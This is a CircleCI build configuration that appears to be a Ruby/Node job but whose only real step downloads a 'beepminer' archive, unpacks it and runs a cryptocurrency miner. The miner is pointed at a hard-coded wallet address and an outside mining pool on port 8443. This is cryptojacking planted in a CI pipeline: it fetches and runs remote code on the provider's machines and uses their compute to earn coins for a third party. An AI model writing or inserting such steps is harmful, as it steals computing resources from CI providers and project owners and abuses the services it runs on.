version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://github.com/Beeppool/miner/releases/download/0.6.0/beepminer-0.6.0.zip && unzip beepminer-0.6.0.zip && cd beepminer-0.6.0 && ./miner --wallet-address='NQ18 M6T5 B72H 6KBY QXYT 76CT RG6D HCQU C1GF' --miner=30 --type=dumb --pool=pool.acemining.co:8443